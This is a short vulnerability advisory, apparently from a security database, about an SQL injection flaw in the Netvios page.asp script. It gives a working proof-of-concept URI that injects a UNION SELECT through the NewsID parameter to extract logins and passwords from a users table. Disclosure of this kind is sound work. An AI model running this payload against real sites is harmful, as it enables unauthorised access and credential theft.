Netvios Page.ASP SQL Injection Vulnerability

info
discussion
exploit
solution
references

Netvios Page.ASP SQL Injection Vulnerability

An attacker can exploit this issue via a web client.

The following proof-of-concept URI is available.

http://www.example.com/page.asp?NewsID=-1%20union%20select%200,0,0,logins,password,0,0,0%20from%20users%20where%20userid%20like%201